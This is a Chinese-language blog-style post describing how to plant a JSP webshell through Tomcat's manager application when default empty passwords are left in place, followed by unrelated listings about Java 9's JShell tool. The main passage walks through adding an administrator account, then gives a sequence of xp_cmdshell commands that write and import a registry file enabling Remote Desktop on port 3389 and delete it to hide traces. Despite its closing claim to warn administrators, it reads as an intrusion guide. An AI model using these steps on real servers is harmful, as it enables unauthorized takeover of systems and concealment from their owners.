一款不错的jsp木马,jshell最近发现修改版很多,而且功能也强大了好多。
首先介绍一下如何上载这款jsp木马,现在的jsp应用大多以tomcat发布,tomcat默认有两个管理应用,分别是admin和manager/html,如果在软件发布的时候没有更改密码或删除应用,就会造成很大的安全隐患,例如这两个应用的默认密码都为空,登录manager后,可以创建上传context应用,如果我们把这款jsp上传的话,基本上整个系统都在我们的掌控之下。
可以执行系统命令,这时可以随便添加一个用户到系统中,然后把该用户添加到administrators用户组中,拿到超级权限,这时可以看看是否开通了3389端口,没开的话可以
//拿到sqlserver管理员密码时 “>”表示覆盖写入,“>>”表示追加写入
exec master.dbo.xp_cmdshell 'echo Windows Registry Editor Version 5.00 >3389.reg'
exec master.dbo.xp_cmdshell 'echo. >>3389.reg'
exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg'
exec master.dbo.xp_cmdshell 'echo "fDenyTSConnections"=dword:00000000 >>3389.reg'
exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg'
exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg'
exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg'
exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg'
//执行注册文件
exec master.dbo.xp_cmdshell 'regedit /s 3389.reg'
//毁尸灭迹
exec master.dbo.xp_cmdshell 'del 3389.reg'
远程登录进去,呵呵,“为所欲为”
本篇只为交流,希望能引起管理员的重视,减少软件的安全隐患。特别是在软件不存在sql注入的情况下,往往令人费解,他是怎么突入进来了,通过tomcat这种漏洞或者算是管理员的疏忽,往往比sql注入更容易突破进来,而且危害也远远大于sql注入。
分享到:
相关推荐
JShell - 用XSS获取一个JavaScript shell
Java 9 with JShell by Gaston C. Hillar English | 29 Mar. 2017 | ASIN: B01N388HH3 | 408 Pages | AZW3 | 8.99 MB Key Features A full account of Java 9's new features This tutorial emphasises fluency ...
备注:该文件是epub格式的。为了更好的阅读体验,建议使用firefox或chrome浏览器并安装相关epub插件来阅读。
Discord-jshell-bot 一个JShell集成,以解决矛盾。
JShell简易版一个简单的VSCode扩展,用于使用jshell内联运行Java代码。 活动编辑器中的脚本发生更改后,代码将立即执行要求需要> = JDK 9(jshell应该可以全局访问)用法ctl + shift + P或cmd + shift + P (Mac) ...
jshell-maven-plugin 这个maven插件可帮助您使用官方Java REPL工具jshell在maven项目中探索代码和依赖项。正在安装(现在,我正在将其部署到中央存储库。在完成之前,请克隆此存储库并手动安装。) JAVA_HOME=/path/...
tryjshell:在Web上尝试JShell
2017年9月21日,千呼万唤始出来,Java9终于发布了。作为自己天天接触的“对象”,还是应该多花点心思去了解她...下面这篇文章主要给大家介绍了关于java9学习系列之安装与jshell使用的相关资料,需要的朋友可以参考下。
提供独立版本的JShell REPL。 包含独立运行JShell所需的任何东西,因此不需要安装完整的JDK。 使用jlink工具嵌入并压缩最小的Java运行时。
主要介绍了java9的JShell小工具和编译器两种自动优化方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
JShellLab:使用Java JShell轻松有效地进行类似于MATLAB的科学编程 安装 JShellLab的安装非常简单: 步骤1下载.zip下载文件并解压缩。 步骤2为您的平台运行适当的脚本,例如,对于像Unix这样的系统的.sh脚本和对于...
javawebshell脚本适用于tomcat
Beginning Java 9 Fundamentals Arrays, Objects, Modules, JShell, and Regular Expressions 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn...
Beginning Java 9 Fundamentals Arrays, Objects, Modules, JShell, and Regular Expressions 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系...
JShellScriptEngine 一个用于Java的JSR-223 ScriptEngine,它允许通过Java 9中的JShell repl执行Java代码段。 这将在当前JVM中运行JShell脚本,从而允许来回传递变量。用法 ScriptEngine engine = new ...
Discord机器人,使您可以与它进行交互,就好像它是JShell会话一样。 使用的技术 JDA(Java Discord API) 壳牌 一些轻量级的ASM,用于扫描执行的代码 要求 Maven 3 Java 11 Docker(如果要构建为Docker映像) ...
基于 JShell 0.2 和 java_cup 0.10k 的 Java Shell http://geophile.com/jshell/ http://www.cs.princeton.edu/~appel/modern/java/CUP/
壳牌使用Java Netbeans的Shell实现。外壳介面使用外部流程实现更改目录功能实现历史记录功能多线程排序多线程排序